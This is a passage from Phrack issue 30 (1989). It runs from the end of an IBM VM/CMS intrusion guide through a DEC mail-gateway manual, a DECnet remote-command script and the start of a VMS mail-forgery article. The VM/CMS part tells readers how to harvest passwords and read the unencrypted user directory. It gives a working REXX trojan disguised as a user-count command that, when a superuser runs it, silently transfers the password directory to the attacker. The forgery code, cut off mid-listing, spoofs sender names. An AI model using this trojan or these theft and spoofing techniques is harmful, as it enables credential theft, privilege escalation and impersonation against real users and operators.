005 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808 MDISK 192 3380 524 020 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808 =============================================================================== If you need an explanation about these two tables, you should look at it like this: |------User ID | |-------That User ID's password ^ ^ USER IDMSSE IDMS 2M 8M G 64 ON ON ON ON ^ ^ ^ | | |---Its privilege grade | |--Its maximum memory storage | |----Its default memory storage INCLUDE EXPPROF <-----What you see when you log on ACCOUNT 101 MDISK 191 3380 519 005 VMPK01 MW VTAM1 WVTAM1 MVTAM1 ^ ^ ^ ^ | | | |---Minidisk mult pass | | |---Minidisk write pass | |---Minidisk read pass |--Its minidisk MDISK 192 3380 524 020 VMPK01 MW VTAM1 WVTAM1 MVTAM1 =============================================================================== Luckily, I have tested the second table in 4 VM systems and it works. May you be lucky too! Of course, since all of us are general users, the first thing to know is how to get privileges by trying a password or by accident by getting privileged users' passwords. While CP/CMS uses passwords to control performance, it must store some passwords in the REXX command language (EXEC files). It looks like this: CP LINK VTAMUSER 191 121 RR VTAM1 If you have succeeded in linking that minidisk then: AC 121 B FILEL * * B Then you can see all of the files owned by VTAMUSER. Usually people are lazy enough to remember too many passwords, so to read the passwords. It may be its CP pass too! TRY IT!!! But IBM is not so stupid as to let any user with privileges open accounts randomly. It limits a maximum of 8 superusers to be able to do it. You may find it in: DIRMAINT DATA Y2 Only these DIRM-STAFF can open accounts from the console. If another user logs on from a terminal, he will be logged out immediately even though he knew the password. And only these STAFF have 2 modes of operation to use: DIRM One is general user mode and the other is operation mode (Privilege operation) so you have to cheat the O.S. to think that you are NOT logged in from a terminal. Our way is to use TELNET. Usually this package is named TCPIP. Do this: TELNET yourhost It will request you logon again. Then, if you logon with the superuser ID & password, the O.S. will not recognize that you are from a terminal and will let you in!! The most important thing is that IBM stores its user IDs & passwords in a file: USER DIRECT Usually, this file is stored on DIRMAINT's minidisk and it is a text file!!! I do not know why, but it actually is not encrypted!!!! Incredible to believe... Once you have this file, you will know all users' passwords and all information about all users' IDs and I think it is rude to open new accounts! Poor me! I've done this and lost privs 3 times now. While there is a way to get back your privs, first you need find a privileged ID so that you can write your file in it. Then, write a EXEC file into it. This file's name must be a most common command that any one will issue. If the general user uses it, nothing happens, but if a superuser issues it, then it will do something for you! Here is a example: Please note that wherever you see (cut), it means that the line was too long and had to be split. Whenever you see (cut), take the line below the line that it is on and paste it on the end of the (cut) line (removing the (cut) in the process). -----------------------------------Cut Here------------------------------------ /* DISPLAY THE NUMBER OF SPECIFIED USERS LOGGED ON */ TRACE O USER = 0 SW = 1 S = 1 PARSE UPPER ARG NAM GARBAGE IF NAM = ' ' THEN signal qname PO = INDEX(NAM,'*') IF PO = 0 THEN DO Q NAM EXIT END T = PO - 1 IF T= 0 THEN signal qname NALL = SUBSTR(NAM,1,T) EXECIO '* CP (STRING Q N ' NUMQ = QUEUED() DO N = 1 TO NUMQ PULL STR PARSE VALUE STR with NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N '-' LC.N (cut) ','ND.N '-' LD.N na.n=substr(strip(na.n,'L'),1,8) nb.n=substr(strip(nb.n,'L'),1,8) nc.n=substr(strip(nc.n,'L'),1,8) nd.n=substr(strip(nd.n,'L'),1,8) END DO N = 1 TO NUMQ IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(NA.N,1,T)=NALL & (cut) SUBSTR(space(NA.N),1,4)^='LOGO' & SPACE A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END; IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(NB.N,1,T)=NALL & (cut) SUBSTR(space(NB.N),1,4)^='LOGO' & SPACE A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END; IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(NC.N,1,T)=NALL & (cut) SUBSTR(space(NC.N),1,4)^='LOGO' & SPACE A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END; IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(ND.N,1,T)=NALL & (cut) SUBSTR(space(ND.N),1,4)^='LOGO' SPACE(L A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END; END CLRSCRN call concate SAY MM= ' <- - - - - - - - - - - -' RIGHT(USER,3,0) ' SPECIFIED LOGON USERS - (cut) - - - - - - - - - - ->' say MM SAY SAY EXIT QNAME: /* DISPLAY THE NUMBER OF USERS LOGGED ON */ USER = 0 SW = 1 S = 1 EXECIO '* CP (STRING Q N ' IF USERID() ='MAINT' THEN SIGNAL NJ /*super user id */ IF USERID() ='JASMIN' THEN SIGNAL NJ /*super user id */ IF USERID() ='LIU' THEN SIGNAL NJ /*supr userid */ IF USERID() ='PMAINT' THEN SIGNAL NJ /*super user id*/ IF USERID() ='MOESERV' THEN SIGNAL NJ /* super user id*/ SIGNAL JP NJ: CP SET IMSG OFF CP SET MSG OFF EXEC DIRMAINT GET DIRMAINT NOLOCK SLEEP 2 SEC CP TRAN USERID() ALL yourid /* to your own id*/ CP SET IMSG ON CP SET MSG ON JP: NUMQ = QUEUED() DO N = 1 TO NUMQ PULL STR PARSE VALUE STR with NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N (cut) '-' LC.N ','ND.N '-' LD.N na.n=substr(strip(na.n,'L'),1,8) nb.n=substr(strip(nb.n,'L'),1,8) nc.n=substr(strip(nc.n,'L'),1,8) nd.n=substr(strip(nd.n,'L'),1,8) END DO N = 1 TO NUMQ IF LA.N ='VTAM' THEN SELECT WHEN (S+0)//4 = 1 THEN DO LA.N ='VTAM' THEN DO A.S ='VSM - VTAM' ; S = S+1 ; A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE END WHEN (S+0)//4 = 2 THEN DO A.S = ' ' ; S = S+1 ; A.S = ' ' ;S=S+1 ; A.S =' ' ; S=S+1 ;END WHEN (S+0)//4 = 3 THEN DO;A.S =' ';S=S+1 ; A.S =' ' ; S=S+1 ;END; WHEN (S+0)//4 = 0 THEN DO; A.S = ' ' ; S=S+1 ; END END IF LA.N ='VTAM' THEN DO A.S ='VSM - VTAM' ; S = S+1 ; A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE END IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(space(NA.N),1,4)^='LOGO' & (cut) SPACE(LA.N)^=SPACE(NA.N) THEN A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END; IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(space(NB.N),1,4)^='LOGO' & (cut) SPACE(LB.N)^=SPACE(NB.N) THEN A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END; IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(space(NC.N),1,4)^='LOGO' & (cut) SPACE(LC.N)^=SPACE(NC.N) THEN A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END; IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(space(ND.N),1,4)^='LOGO' & (cut) SPACE(LD.N)^=SPACE(ND.N) THEN A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END; END CLRSCRN call concate SAY MM= ' <- - - - - - - - - - - - - ' RIGHT(USER,3,0) ' LOGON USERS - - - - (cut) - - - - - - - - - - ->' say MM SAY exit concate: DO I = 1 TO S-1 BY 4 IF I+1 < S THEN P=I+1 ; ELSE A.P = ' ' IF I+2 < S THEN Q=I+2 ; ELSE A.Q = ' ' IF I+3 < S THEN R=I+3 ; ELSE A.R = ' ' STR= ' ' IF I+3 < S THEN R=I+3 ; ELSE A.R = ' ' STR=INSERT(A.I,STR,1) ; STR=INSERT(A.P,STR,21) STR=INSERT(A.Q,STR,41) ; STR=INSERT(A.R,STR,61) SAY STR END return -----------------------------------Cut Here------------------------------------ Well, that is it...Unfortunately, we did not know how to install a backdoor in IBM VM/CMS so we could not keep privs permanently. It is a pity...but we're glad to share our experience with hackers! Sincerely, Goe _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #5 of 12 ()()()()()()()()()()()()()()()()()()() () () () The DECWRL Mail Gateway () () () () by Dedicated Link () () () () September 20, 1989 () () () ()()()()()()()()()()()()()()()()()()() INTRODUCTION DECWRL is a mail gateway computer operated by Digital's Western Research Laboratory in Palo Alto, California. Its purpose is to support the interchange of electronic mail between Digital and the "outside world." DECWRL is connected to Digital's Easynet, and also to a number of different outside electronic mail networks. Digital users can send outside mail by sending to DECWRL::"outside-address", and digital users can also receive mail by having your correspondents route it through DECWRL. The details of incoming mail are more complex, and are discussed below. It is vitally important that Digital employees be good citizens of the networks to which we are connected. They depend on the integrity of our user community to ensure that tighter controls over the use of the gateway are not required. The most important rule is "no chain letters," but there are other rules depending on whether the connected network that you are using is commercial or non-commercial. The current traffic volume (September 1989) is about 10,000 mail messages per day and about 3,000 USENET messages per day. Gatewayed mail traffic has doubled every year since 1983. DECWRL is currently a Vax 8530 computer with 48 megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit) modem ports, and various network connections. They will shortly be upgrading to a Vax 8650 system. They run Ultrix 3.0 as the base operating system. ADMINISTRATION The gateway has engineering staff, but no administrative or clerical staff. They work hard to keep it running, but they do not have the resources to answer telephone queries or provide tutorials in its use. They post periodic status reports to the USENET newsgroup dec.general. Various helpful people usually copy these reports to the VAXNOTES "gateways" conference within a day or two. HOW TO SEND MAIL DECWRL is connected to quite a number of different mail networks. If you were logged on directly to it, you could type addresses directly, e.g. To: strange!foreign!address. But since you are not logged on directly to the gateway, you must send mail so that when it arrives at the gateway, it will be sent as if that address had been typed locally. * Sending from VMS If you are a VMS user, you should use NMAIL, because VMS mail does not know how to requeue and retry mail when the network is congested or disconnected. From VMS, address your mail like this: To: nm%DECWRL::"strange!foreign!address" The quote characters (") are important, to make sure that VMS doesn't try to interpret strange!foreign!address itself. If you are typing such an address inside a mail program, it will work as advertised. If you are using DCL and typing directly to the command line, you should beware that DCL likes to remove quotes, so you will have to enclose the entire address in quotes, and then put two quotes in every place that one quote should appear in the address: $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello" Note the three quotes in a row after foreign!addr. The first two of them are doubled to produce a single quote in the address, and the third ends the address itself (balancing the quote in front of the nm%). Here are some typical outgoing mail addresses as used from a VMS system: To: nm%DECWRL::"lll-winkin!netsys!phrack" To: nm%DECWRL::"postmaster@msp.pnet.sc.edu" To: nm%DECWRL::"netsys!phrack@uunet.uu.net" To: nm%DECWRL::"phrackserv@CUNYVM.bitnet" To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org" * Sending from Ultrix If your Ultrix system has been configured for it, then you can, from your Ultrix system, just send directly to the foreign address, and the mail software will take care of all of the gateway routing for you. Most Ultrix systems in Corporate Research and in the Palo Alto cluster are configured this way. To find out whether your Ultrix system has been so configured, just try it and see what happens. If it doesn't work, you will receive notification almost instantly. NOTE: The Ultrix mail system is extremely flexible; it is almost completely configurable by the customer. While this is valuable to customers, it makes it very difficult to write global instructions for the use of Ultrix mailers, because it is possible that the local changes have produced something quite unlike the vendor-delivered mailer. One of the popular changes is to tinker with the meaning of quote characters (") in Ultrix addresses. Some systems consider that these two addresses are the same: site1!site2!user@host.dec.com and "site1!site2!user"@host.dec.com while others are configured so that one form will work and the other will not. All of these examples use the quotes. If you have trouble getting the examples to work, please try them again without the quotes. Perhaps your Ultrix system is interpreting the quotes differently. If your Ultrix system has an IP link to Palo Alto (type "/etc/ping decwrl.dec.com" to find out if it does), then you can route your mail to the gateway via IP. This has the advantage that your Ultrix mail headers will reach the gateway directly, instead of being translated into DECNET mail headers and then back into Ultrix at the other end. Do this as follows: To: "alien!address"@decwrl.dec.com The quotes are necessary only if the alien address contains a ! character, but they don't hurt if you use them unnecessarily. If the alien address contains an "@" character, you will need to change it into a "%" character. For example, to send via IP to joe@widget.org, you should address the mail To: "joe%widget.org"@decwrl.dec.com If your Ultrix system has only a DECNET link to Palo Alto, then you should address mail in much the same way that VMS users do, save that you should not put the nm% in front of the address: To: DECWRL::"strange!foreign!address" Here are some typical outgoing mail addresses as used from an Ultrix system that has IP access. Ultrix systems without IP access should use the same syntax as VMS users, except that the nm% at the front of the address should not be used. To: "lll-winken!netsys!phrack"@decwrl.dec.com To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com DETAILS OF USING OTHER NETWORKS All of the world's computer networks are connected together, more or less, so it is hard to draw exact boundaries between them. Precisely where the Internet ends and UUCP begins is a matter of interpretation. For purposes of sending mail, though, it is convenient to divide the network universe into these categories: Easynet Digital's internal DECNET network. Characterized by addresses of the form NODE::USER. Easynet can be used for commercial purposes. Internet A collection of networks including the old ARPAnet, the NSFnet, the CSnet, and others. Most international research, development, and educational organizations are connected in some fashion to the Internet. Characterized by addresses of the form user@site.subdomain.domain. The Internet itself cannot be used for commercial purposes. UUCP A very primitive network with no management, built with auto-dialers phoning one computer from another. Characterized by addresses of the form place1!place2!user. The UUCP network can be used for commercial purposes provided that none of the sites through which the message is routed objects to that. USENET Not a network at all, but a layer of software built on top of UUCP and Internet. BITNET An IBM-based network linking primarily educational sites. Digital users can send to BITNET as if it were part of Internet, but BITNET users need special instructions for reversing the process. BITNET cannot be used for commercial purposes. Fidonet A network of personal computers. I am unsure of the status of using Fidonet for commercial purposes, nor am I sure of its efficacy. DOMAINS AND DOMAIN ADDRESSING There is a particular network called "the Internet;" it is somewhat related to what used to be "the ARPAnet." The Internet style of addressing is flexible enough that people use it for addressing other networks as well, with the result that it is quite difficult to look at an address and tell just what network it is likely to traverse. But the phrase "Internet address" does not mean "mail address of some computer on the Internet" but rather "mail address in the style used by the Internet." Terminology is even further confused because the word "address" means one thing to people who build networks and something entirely different to people who use them. In this file an "address" is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what network engineers would call an "internet address"). The Internet naming scheme uses hierarchical domains, which despite their title are just a bookkeeping trick. It doesn't really matter whether you say NODE::USER or USER@NODE, but what happens when you connect two companies' networks together and they both have a node ANCHOR?? You must, somehow, specify which ANCHOR you mean. You could say ANCHOR.DEC::USER or DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR. The Internet convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name (ANCHOR). But there could be several different organizations named DEC. You could have Digital Equipment Corporation or Down East College or Disabled Education Committee. The technique that the Internet scheme uses to resolve conflicts like this is to have hierarchical domains. A normal domain isn't DEC or STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational). These domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU. This doesn't resolve conflicts completely, though: both Central Michigan University and Carnegie-Mellon University could claim to be CMU.EDU. The rule is that the owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets to decide whether the Electrical Engineering department or the Elementary Education department gets subdomain EE.CMU.EDU. The domain scheme, while not perfect, is completely extensible. If you have two addresses that can potentially conflict, you can suffix some domain to the end of them, thereby making, say, decwrl.UUCP be somehow different from DECWRL.ENET. DECWRL's entire mail system is organized according to Internet domains, and in fact we handle all mail internally as if it were Internet mail. Incoming mail is converted into Internet mail, and then routed to the appropriate domain; if that domain requires some conversion, then the mail is converted to the requirements of the outbound domain as it passes through the gateway. For example, they put Easynet mail into the domain ENET.DEC.COM, and they put BITNET mail into the domain BITNET. The "top-level" domains supported by the DECWRL gateway are these: .EDU Educational institutions .COM Commercial institutions .GOV Government institutions .MIL Military institutions .ORG Various organizations .NET Network operations .BITNET The BITNET .MAILNET The MAILNET .?? 2-character country code for routing to other countries .OZ Part of the Australian (.AU) name space. 2-character country codes include UK (United Kingdom), FR (France), IT (Italy), CA (Canada), AU (Australia), etc. These are the standard ISO 2-character country codes. MAILING TO EASYNET To mail to user SPRINTER at node WASH (which is DECNET address WASH::SPRINTER), Internet mail should be addressed to sprinter@wash.enet.dec.com. Easynet addresses are not case-dependent; WASH and wash are the same node name and SPRINTER and sprinter are the same user name. Sites that are not directly connected to the Internet may have difficulty with Internet addresses like wash.enet.dec.com. They can send into the Easynet by explicitly routing the mail through DECWRL. From domain-based Internet mailers, the address would be sprinter%wash.enet@decwrl.dec.com. From UUCP mailers, the address would be decwrl!wash.enet!sprinter. Some Internet mailers require the form <@decwrl.dec.com:sprinter@wash.enet>. (This last form is the only technically correct form of explicit route, but very few Internet sites support it.) The DECWRL gateway also supports various obsolete forms of addressing that are left over from the past. In general they support obsolete address forms for two years after the change, and then remove it. MAILING TO DIGITAL ALL-IN-1 USERS Some Easynet users do not have a direct DECNET node address, but instead read their mail with All-in-1, which uses addresses of the form "Nate State @UCA". Here "UCA" is a Digital location code name. To route mail to such people, send to Nate.State@UCA.MTS.DEC.COM. Mail received from the All-in-1 mailer is unreplyable, and in fact unless the respondent tells you his return address in the body of the message, it is not normally possible even to puzzle out the return address by studying the message header. Mail from All-in-1 to Easynet passes through a gateway program that does not produce valid return addresses. MAILING TO THE INTERNET DECWRL's mailer is an Internet mailer, so to mail to an Internet site, just use its address. If you are having trouble determining the Internet address, you might find that the Ultrix host table /etc/hosts.txt is useful. If you can't find one anywhere else, there's one on DECWRL. See the comments above under "how to send mail" for details about making sure that the mail program you are using has correctly interpreted an address. MAILING TO UUCP UUCP mail is manually routed by the sender, using ! as the separator character. Thus, the address xxx!yyy!zzz!user means to dial machine xxx and relay to it the mail, with the destination address set to yyy!zzz!user. That machine in turn dials yyy, and the process repeats itself. To correctly address UUCP mail, you must know a working path through the UUCP network. The database is sufficiently chaotic that automatic routing does not work reliably (though many sites perform automatic routing anyhow). The information about UUCP connectivity is distributed in the USENET newsgroup comp.mail.maps; many sites collect this data and permit local queries of it. At the end of this file is a list of the UUCP nodes to which DECWRL currently has a working connection. MAILING TO USENET Usenet is not a network. It's a software layer, and it spans several networks. Many people say "Usenet" when they really mean UUCP. You can post a message to a Usenet newsgroup by mailing it to "name@usenet" at DECWRL. For example, mailing from VMS to this address: nm%DECWRL::"alt.cyberpunk@usenet" causes the mail message to be posted as an article to the Usenet newsgroup alt.cyberpunk. It is better to use Usenet software for posting articles, as more features are available that way, such as restricted distributions, crossposting, and cancellation of "wish I hadn't sent that" articles. MAILING TO BITNET Legend has it that the "BIT" in BITNET stands for "Because It's There" or "Because It's Time." It is a network consisting primarily of IBM computers. A native BITNET address is something like "OMAR at STANFORD", but when translated into our Internet format it becomes omar@stanford.bitnet. Once translated into Internet form, a BITNET address is used just like any other Internet address. MAILING TO FIDONET By comparison with the other linked networks, Fidonet has an addressing complexity bordering on the bizarre. The Fidonet people have provided me with this description: Each Fidonet node is a member of a "network," and may have subsidiary nodes called "point nodes." A typical Fido address is "1:987/654" or "987/654"; a typical Fido "point node" address is "1:987/654.32" or "987/654.32". This is zone 1, network 987, Fido (node) 654, "point node" 32. If the zone number is missing, assume it is zone 1. The zone number must be supplied in the outgoing message. To send a message to Chris Jones on Fidonet address 1:987/654, use the address Chris.Jones@f654.n987.z1.fidonet.org. To send a message to Mark Smith at Fidonet node 987/654.32, use address Mark.Smith@p32.f654.n987.z1.fidonet.org. Use them just like any other Internet address. Sometimes the return addresses on messages from Fidonet will look different. You may or may not be able to reply to them. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Appendix: List of UUCP Neighbor Sites This table shows most of the sites that DECWRL dials directly via UUCP. You may find it useful to help you construct a UUCP route to a particular destination. Those sites marked with "*" are major UUCP routing nodes. You should prefer UUCP routes that use these sites as the first hop from DECWRL. Case is significant in UUCP host names. 3comvax 3Com Corporation, Santa Clara, CA abvax Allen-Bradley Company, Highland Heights, OH acad Autodesk, Inc, Sausalito, CA adobe Adobe Systems Inc., Mountain View, CA alberta University of Alberta, Edmonton, Alberta, Canada allegra AT&T Bell Laboratories, Murray Hill, NJ *amdahl Amdahl Corp., Sunnyvale, CA amdcad Advanced Micro Devices, Sunnyvale, CA ames NASA Ames Research Center, Mountain View, CA *apple Apple Computers, Cupertino, CA ardent Ardent Computer Corp., Sunnyvale, CA argosy MassPar Computer Corp., Sunnyvale, CA atha Athabasca University, Athabasca, Alberta, Canada athertn Atherton Technology, Sunnyvale, CA *att AT&T Bell Laboratories, Columbus, Ohio avsd Ampex Corporation, Redwood City, CA cae780 Tektronix Inc. (Santa Clara Field Office) Santa Clara, CA chip M/A-COM Government Systems, San Diego, CA claris Claris Corporation, Mountain View, CA daisy Daisy Systems, Mountain View, CA decuac DEC/Ultrix Applications Ctr, Landover, MD *decvax DEC/Ultrix Engineering, Nashua, NH dsinc Datacomp Systems, Inc, Huntington Valley, PA eda EDA Systems Inc., Santa Clara, CA emerald Emerald Systems Corp., San Diego, CA escd Evans and Sutherland Computer Division, Mountain View, CA esunix Evans and Sutherland Corp., Salt Lake City, UT fluke John Fluke Manufacturing, Everett, WA gryphon Trailing Edge Technology, Redondo Beach, CA handel Colorodo State Univ., CS Dept., Ft. Collins, CO hoptoad Nebula Consultants, San Francisco, CA *hplabs Hewlett Packard Research Labs, Palo Alto, CA ide Interactive Development Environments, San Francisco, CA idi Intelligent Decisions, Inc., San Jose, CA imagen Imagen Corp., Santa Clara, CA intelca Intel Corp., Santa Clara, CA limbo Intuitive Systems, Los Altos, CA logitech Logitech, Inc., Palo Alto, CA megatest Megatest Corp., San Jose, CA metaphor Metaphor Corp., Mountain View, CA microsoft Microsoft, Bellevue, WA mindcrf Mindcraft Corp., Palo Alto, CA mips MIPS Computer Systems, Mountain View, CA mntgfx Mentor Graphics Corp., Beaverton, OR mordor Lawrence Livermore National Lab, Livermore, CA mtu Michigan Tech Univ., Houghton, MI mtxinu Mt. Xinu, Berkeley, CA nsc National Semiconductor Corp., Sunnyvale, CA oli-stl Olivetti Software Techn. Lab, Menlo Park, CA oracle Oracle Corp., Belmont, CA *pacbell Pacific Bell, San Ramon, CA parcplace Parc Place Systems, Palo Alto, CA purdue Purdue University, West Lafayette, IN *pyramid Pyramid Technology Corporation, Mountain View, CA qubix Qubix Graphic Systems, San Jose, CA quintus Quintus Computer Systems, Mountain View, CA research AT&T Bell Laboratories, Murray Hill, NJ riacs Res.Inst. for Adv. Compu. Sci., Mountain View, CA rtech Relational Technology Inc., Alameda, CA sci Silicon Compilers, San Jose, CA sco Santa Cruz Operation, Santa Cruz, CA sequent Sequent Computer System, Inc., Beaverton, OR sgi Silicon Graphics, Inc., Mountain View, CA shell Shell Development Corp., Houston, TX simpact Simpact Assoc., San Diego, CA sjsca4 Schlumberger Technologies, San Jose, CA sun Sun Microsystems, Mountain View, CA td2cad Intel Corp., Santa Clara, CA teraida Teradyne EDA Inc., Santa Clara, CA theta Process Software Inc., Wellesley, MA turtlevax CIMLINC, Inc, Palo Alto, CA *ucbvax University of California, Berkeley, CA utcsri Univ. of Toronto, Computer Science, Toronto, CA vlsisj VLSI Technology Inc., San Jose, CA wyse Wyse Technology, San Jose, CA zehntel Zehntel, Inc., Walnut Creek, CA _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #6 of 12 Decnet Hackola : Remote Turist TTY (RTT) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A Late-Night Creation Of *Hobbit* This VMS network frob is yet another "tell"-type thing. This one has an uncommon feature though: recursion (i.e. you can be connected to some host and open *another* connection to a third host and it will [attempt to!] "do the right thing"). Also, you can ^Y out and if you run it again, it will return to the open connection instead of starting a new one. _H* ************************************************************************* $! RTT -- Remote Turist TTY interface. Do @RTT hostname or @RTT area.node $! to start; this file must exist in the remote machine's default area. $! You can ^Y out and the network channel will stick around; invoking RTT $! again will resume the extant process and ignore arguments. $! If we are a network object, play server, if not, we must be the client. $! If we are called while already playing server, recurse to the end host. $! This recursion in theory can happen infinite times. Make damn sure $! what you call this file and the "task=" spec jive, and that they are the $! same file, or you will fall victim to very vicious timing screws. $! $! Another result of *Hobbit* abusing network file jobs until well past dawn. $! $! _H* $set noon $if f$mode().eqs."NETWORK".and.p1.eqs."" then $goto srv $! Talking to a luser, go find the net job $magic=0 ! assume top level $if f$trnlnm("nf",,,,,"table_name").nes."" then $goto lread $sl=f$len(p1) $dot=f$locate(".",p1) ! area.node $if sl.eq.dot then $goto nopen ! no dot, treat normally $q=f$loc("""",p1) ! access control?? $node=f$ext(0,dot,p1) ! area $dot=dot+1 ! point past it now $node=node*1024+f$ext(dot,q-dot,p1) ! and pull out the complete node $rest=""""+f$ext(q,80,p1)+"""" ! superquotify the quotes [yeccchh!] $p1="''node'''rest'" ! add remains in stringwise [ack barf] $! We were called with an argument; but if we're network mode, we're *already* $! a server, so do special things. $nopen: $if f$mode().eqs."NETWORK" then $magic=1 $! Top-level user process or recursed here: client connect $open/read/write/err=yuk nf 'p1'::"0=rtt" $read/time=5/err=yuk nf hprm ! let other end tell us where we got $prm==hprm ! global prompt str so we resume correctly $write sys$output "Connection open" $if magic then $goto m_setup $lread: $read/prompt="''prm'$ "/end=lclose sys$command line $write nf line ! send the sucker and go get the stuff $ltype: $read/time=8/err=tmo/end=lclose nf line $if line.eqs."%%eoc%%" then $goto lread $if line.eqs."%%magic%%" then $goto newprm $write sys$output line $goto ltype $newprm: $read nf hprm ! new prompt gets piped in from servers $prm==hprm ! let us find it $read nf line ! garbola %%eoc%% -- avoid timing fuckup $if line.nes."%%eoc%%" then $goto hpe !! oops !! $goto lread $tmo: $write sys$output "[Timed out]" ! supposed to bail out on a fuckup $goto lread ! it doesn't always work, though. $! $! Do a special dance when we're recursing $m_setup: $write nnn "%%magic%%" $write nnn prm ! notify client end of new connection $signal ! flush the inbetweens $goto rread ! and drop to magic server $! $srv: ! Normal remote task half $! This is an unbelievable kludge. You can't just open sys$net: and then $! have program output go there as well as the control thingies, but you $! *can* pipe everything to your sys$net-opened-device: and it *works*! $open/read/write/err=yuk nnn sys$net: $close sys$output ! netserver.log? $close sys$error $magic=0 ! not recursing yet $! Some handy symbols for the far end $rtt:==@sys$login:rtt ! make further connects easier $ncp:==$ncp ! for hacking the network $signal:==write nnn """%%eoc%%""" ! magic sync string $write nnn f$trnl("sys$node","lnm$system_table") ! HELO... $def/pr sys$output nnn: ! the awful kludge is invoked $def/pr sys$error nnn: ! for error handling too $! $! Server loop $rread: $read/end=rclose nnn line $if magic then $goto passing $'line' $m_cmd_end: $signal ! signal for all completions $goto rread $! If we're magically in the middle, handle differently $passing: $write nf line $mtype: $read/time=5/err=mclose/end=mclose nf line $if line.eqs."%%eoc%%" then $goto m_cmd_end $write nnn line $goto mtype $! $! Closure and error handlers $! General protocol error catch $yuk: $write sys$output "Couldn't open network!" $exit $! Here if the luser typed ^Z $lclose: $close nf ! should signal eof at far end $exit $! Here if we got hung up on by the client $rclose: $if magic then $close nf $close nnn $stop/id=0 $! Here if we're magic and our remote server exited: tell client whats flying $mclose: $close nf $magic=0 $write nnn "%%magic%%" $write nnn f$trnl("sys$node","lnm$system_table") $signal $goto rread $! Here if we recursed down the line there and didn't see the right things $hpe: $write sys$output "!!Hairy protocol error!!" $close nf $exit _______________________________________________________________________________ ==Phrack Inc.= Volume Three, Issue 30, File #7 of 12 =-------------------= VAX/VMS Fake Mail by Jack T. Tab =-------------------= In the August 1986 issue of VAX PROFESSIONAL, the BASIC subroutine that appears at the end of this text was published. It was not until more than two years later that DEC included a callable mail interface with VMS 5.x. While the official version is much more extensive, the routine included here has one important feature. The ability to have a mail message appear to be from someone else is a good addition to most "toolkits." VMS Mail works in two manners. The first is the familiar interactive. The second is as a network object. In this method, MAIL is invoked by the NETSERVER.COM command procedure in response to an incoming connect request. MAIL.EXE is activated as network object 27. The other network objects can be viewed by using the NCP command SHOW KNOWN OBJECTS. In this mode, MAIL.EXE operates as a slave process, receiving instructions from the master process. The master, in most cases, is another process running MAIL.EXE interactively. The slave process can handle requests to deliver mail to as many recipients as necessary. Addresses that are not on the same node as the slave process are forwarded by activating yet another slave process on the target node. The information sent by the master MAIL to the slave MAIL is quite simple and straightforward, consisting of a series of strings. The first string is for the FROM name. This is what makes the subroutine useful, as it can be anything (i.e. the_Easter_Bunny). The next set of strings are to whom the mail is to be sent. One address per string, with a null string, chr(0), terminating the list. The third item is what the receiver(s) sees in their TO: field. This also can be anything. VMS MAIL can use this option for its .DIS distribution lists. The final information is the body of the message. It too is terminated by another null string. The subject of the mail message is taken from the first line of this text. The MAIL slave will send back appropriate status messages indicating problems if they occur. Such as "Addressee Unknown" or VMS and DECnet errors like "Disk Quota Exceeded" or "Remote Node Not Reachable"). The only privilege that seems necessary is NETMBX. Without it the subroutine cannot call MAIL as a network object. Our beloved system management resolved the problem of people pretending to be SYSTEM by installing MAIL with NETMBX and removing the priv from the student accounts. The subroutine works just as well with JNET and BITNET as it does with DECNET addresses. ***********************************CUT HERE************************************ 1 %TITLE 'MAIL SUBROUTINE' SUB MAILT( STRING NODE, & STRING FROM_NAME, & STRING TO_LIST(), & STRING TO_SHOW, & STRING SUBJECT, & STRING TEXT() ) OPTION TYPE = INTEGER DECLARE INTEGER FUNCTION & PUT_MSG DECLARE STRING FUNCTION & GET_MSG, & GET_INPUT DECLARE INTEGER CONSTANT & TRUE = -1, & FALSE = 0 Net_Link_Open = FALSE Z = POS( NODE + ":" , ":" , 1) NODE_NAME$ = LEFT$( NODE , Z - 1 ) ON ERROR GOTO Mail_Net_Error MAIL_CHANNEL = 12 OPEN NODE_NAME$ + '::"27="' AS FILE MAIL_CHANNEL Net_Link_Open = TRUE STS = PUT_MSG( FROM_NAME ) IF STS <> 0 THEN GOTO ERROR_DONE END IF RECEIVERS = 0 TO_COUNT = 